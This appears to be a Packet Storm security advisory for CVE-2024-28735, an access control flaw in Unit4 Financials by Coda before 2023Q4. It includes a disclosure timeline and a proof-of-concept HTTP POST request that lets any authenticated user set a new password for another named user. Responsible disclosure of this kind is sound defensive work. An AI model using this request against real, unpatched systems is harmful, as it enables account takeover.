Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.
b902e8c8533e18988a3d9cf1a301f95fdca312dbda532a060668f36b710b0b68# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Léo DRAGHI
# CVE: CVE-2024-28735
# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.
POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>
{
"user" : "<targeted_user>",
"password" : "<attacker_user_password>",
"company" : "<company>",
"newPassword" : "<new_password_for_targeted_user",
"tzOffset" :240
}
# TIMELINE
– 30/10/2023: Vulnerability found
– 02/11/2023: Vendor informed
– 05/12/2023: Vendor fixed the issue
– 14/03/2024: Public disclosure
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed